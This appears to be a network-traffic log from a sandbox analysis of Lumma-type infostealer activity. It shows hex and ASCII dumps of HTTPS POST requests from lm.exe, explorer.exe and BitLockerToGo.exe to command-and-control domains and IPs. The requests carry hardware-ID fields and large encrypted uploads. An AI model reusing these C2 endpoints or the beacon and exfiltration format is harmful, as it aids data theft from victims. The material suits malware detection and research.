4b 6a 2b 36 41 42 Data Ascii: gAa+bWkwE0RSl7uWwnWeEBcISHFShu/wCmpBGTVq+QOkG1DQo8fOdRj/kb9R4fMK/d+QYc4s1ibTx1PPqwcOENhRYmLWqCESXxCkooKceRv1WK5BWZMer4ca3J60b5G6qT9FK162WCWSRBSL9AhqryHQ/FGVAkaG1+O50sEoJJPvgTD/+k4xqjXmceWnOwXY4ruZpRvKUbwc98l3Qiyqp5HlkLegGaucfvK3oykWC8pzkNQigdDFeqwlrKj+6AB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	62295	172.67.213.85	443	5724	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:36 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: liernessfornicsa.shop
2024-07-27 05:44:36 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-27 05:44:36 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-07-27 05:44:37 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ujbvc7q7o7a243578969tsv0fh; expires=Tue, 19-Nov-2024 23:31:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SXUCybq%2BEbdqqdOQmkj6c%2Fmypn%2BlmBdtEcnEgCB3hSZ1gbehiTwU9ubywPL3x3VqBPaecasRF0ZVI3fNU%2BXwFCPLyQw6iBOKLRXT8KhPHgfXyEvcNFcJ0SRmCHJmXwM6JycGBr6LEqw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a518f4f6d0f84-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:37 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:44:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	62296	172.67.213.85	443	5724	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:38 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: liernessfornicsa.shop
2024-07-27 05:44:38 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-27 05:44:38 UTC	804	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=454sge0j48dcknfc5mkb6v7v00; expires=Tue, 19-Nov-2024 23:31:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TQnZy7W3shpf8UHMUxKWV%2FDnTHykMuSE4R4QrGll83jPIEGpS97UTYtCMEEiiojJfAbEfwJuj3q4GHiLhO5%2Bt8I9GLFVhqUG4G6uTJoOhZsiUboZOSbn0cj3JHGTXVMhn7JLDdhUjDw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a519748038ce6-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:38 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:44:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	62297	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:38 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:44:38 UTC	1267	OUT	Data Raw: 68 52 79 36 43 61 59 54 6b 73 34 4c 79 39 6b 58 59 34 6d 64 69 64 37 62 6a 54 2b 43 6f 77 79 4b 67 43 6d 63 45 78 56 43 70 6b 46 49 39 72 72 77 44 70 79 39 2f 2f 79 6b 74 6a 63 67 39 62 46 38 47 79 6b 43 49 73 6c 56 73 76 6b 32 67 67 6d 31 48 46 52 31 35 64 74 66 55 47 2f 48 33 78 4e 4b 76 54 47 62 45 36 6e 63 6a 76 4d 78 72 63 6a 63 6b 38 61 41 78 48 2b 54 61 51 64 4c 7a 31 51 4b 4a 52 30 63 36 6d 62 32 41 32 4e 71 32 5a 4c 6d 66 39 59 30 41 33 51 47 55 32 39 36 6a 31 66 52 37 35 46 53 76 61 38 6e 36 31 47 59 6a 7a 78 59 32 38 68 76 55 35 34 63 32 6f 59 6f 64 55 74 6c 71 4d 64 6d 79 36 67 79 42 74 33 4c 71 32 49 34 69 4c 66 66 4a 49 69 36 2b 54 62 32 4f 6f 75 4b 43 76 6a 39 67 77 7a 74 74 51 44 67 2b 71 6a 71 36 4e 41 33 30 53 37 4f 6a 49 35 38 51 6b 64 Data Ascii: hRy6CaYTks4Ly9kXY4mdid7bjT+CowyKgCmcExVCpkFI9rrwDpy9//yktjcg9bF8GykCIslVsvk2ggm1HFR15dtfUG/H3xNKvTGbE6ncjvMxrcjck8aAxH+TaQdLz1QKJR0c6mb2A2Nq2ZLmf9Y0A3QGU296j1fR75FSva8n61GYjzxY28hvU54c2oYodUtlqMdmy6gyBt3Lq2I4iLffJIi6+Tb2OouKCvj9gwzttQDg+qjq6NA30S7OjI58Qkd
2024-07-27 05:44:39 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:39 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:39 UTC	685	IN	Data Raw: 4d 30 5a 72 51 6a 72 66 30 6a 4b 2f 71 4a 55 59 7a 73 65 74 38 63 64 6e 68 48 64 4a 64 4b 64 53 69 61 46 72 4e 68 51 37 50 46 78 6a 51 4f 74 6b 6c 2b 6e 4d 48 72 79 32 67 31 41 41 6f 52 2b 36 66 32 4a 77 41 4c 7a 48 54 78 6a 74 74 58 67 72 4c 6c 32 73 50 65 48 6a 44 77 41 55 47 49 78 6f 30 75 4e 79 62 65 76 49 35 77 2f 52 43 32 61 5a 6c 6d 43 78 31 36 4d 73 66 72 35 37 4a 34 43 48 35 74 43 65 51 33 49 38 64 58 5a 2f 34 68 53 6e 7a 62 4f 70 31 31 38 2b 4d 74 65 6b 61 2b 48 70 7a 42 6c 33 72 51 53 45 43 47 46 52 72 62 62 69 72 42 39 5a 77 57 76 76 72 33 36 39 5a 37 63 76 67 62 7a 6c 57 51 34 48 77 7a 34 49 32 65 64 59 49 68 54 6e 49 43 4a 6e 2f 38 54 39 76 4c 31 6f 4d 56 32 76 53 71 44 62 56 62 67 53 76 6e 76 5a 2f 51 75 6b 31 39 48 6a 77 48 70 4c 49 43 4d Data Ascii: M0ZrQjrf0jK/qJUYzset8cdnhHdJdKdSiaFrNhQ7PFxjQOtkl+nMHry2g1AAoR+6f2JwALzHTxjttXgrLl2sPeHjDwAUGIxo0uNybevI5w/RC2aZlmCx16Msfr57J4CH5tCeQ3I8dXZ/4hSnzbOp118+Mteka+HpzBl3rQSECGFRrbbirB9ZwWvvr369Z7cvgbzlWQ4Hwz4I2edYIhTnICJn/8T9vL1oMV2vSqDbVbgSvnvZ/Quk19HjwHpLICM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	62298	188.114.97.3	443	1988	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:39 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 566562 Host: callosallsaospz.shop
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: 15 2b 4c 25 56 4a 33 96 00 92 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96 80 df 1e 9a 36 3a 50 10 fc e8 47 b3 37 8f 8c 04 aa c4 af dd 3c 9a 87 a2 d6 47 Data Ascii: +L%VJ3Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\\|H36:PG7<G
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: 6f 59 19 49 63 1f 47 da 98 39 bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93 95 a7 76 27 9e 4d 6a 3d 48 be c0 68 58 38 c1 6e d4 cd 93 08 63 a6 d6 94 7d 28 Data Ascii: oYIcG9h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>Xv'Mj=HhX8nc}(
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: 21 ee ee 1d a0 fa 42 97 d3 ef 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b e7 68 7e 65 ad fd e4 4f bb 67 78 fa 2d 7f aa 1e 74 7b f5 c1 56 8d 62 51 da 3c Data Ascii: !B-CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<h~eOgx-t{VbQ<
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: fd b9 38 b8 79 50 47 b8 cb 57 eb 34 c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2 2c 2b 41 10 f1 67 7b 3a 50 d1 7e 86 24 d6 1a a4 06 6e 45 69 53 0f 7d dc f7 90 Data Ascii: 8yPGW4Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<#],+Ag{:P~$nEiS}
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: 41 90 d2 e4 c6 f7 72 e2 6c e7 e4 d2 da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53 53 9f d5 93 c7 84 c0 3e 3f aa 43 fa a7 98 e7 41 fe 55 8c 1c 21 e6 f8 7d 1e b0 Data Ascii: Arl[:9:rdEl\|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[\|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDSS>?CAU!}
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: 84 91 e5 6d 96 b5 0b 99 5e ff 59 4e 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08 5c dd 18 2d f9 58 23 3d 5a a9 d4 b7 59 09 53 1f 03 10 5d 4a 7f c7 01 3c ca 3e Data Ascii: m^YN%z*~d7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F\-X#=ZYS]J<>
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: fb 0e f5 27 91 10 22 87 98 77 a2 1e 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf a7 24 e0 9a d7 d2 e6 97 44 3c a9 d6 54 2e fd e7 75 da 59 bd a1 66 da 1c 62 a9 Data Ascii: '"w!CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc($D<T.uYfb
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: f7 00 fa 60 26 42 4b 82 98 f9 b2 a0 ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26 e5 91 f9 f9 66 b7 e8 51 61 82 c2 4c ed 65 61 be 6f d5 9f e5 19 da fc 74 2a db Data Ascii: `&BK~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&fQaLeaot
2024-07-27 05:44:39 UTC	15331	OUT	Data Raw: ed fb 02 38 47 cd 56 bc 10 1b 80 7d b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31 9d 37 ca 89 e1 de 52 cc 66 95 79 6f 57 c4 37 fd 56 a5 87 e2 39 0f ae f1 5b 00 Data Ascii: 8GV}E?@}36?>u%AnP\|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y17RfyoW7V9[
2024-07-27 05:44:41 UTC	818	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rfpq5gud40mg1b4vf40kfc3bu2; expires=Tue, 19-Nov-2024 23:31:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1oTq%2B58AMSpQdo6k%2FM6Mt81yzPPszvVDTWyWraMB74hhGk2%2BFfDPePLMVrLue1u61Qc6b8SZfu8eMT4uznU1e0mNFh5krd%2Btlw%2Bvuf2a6pOyZsn6LkyoHmLySu%2BkJTa%2FpLPGV%2Bc0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a519d6a4272a7-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
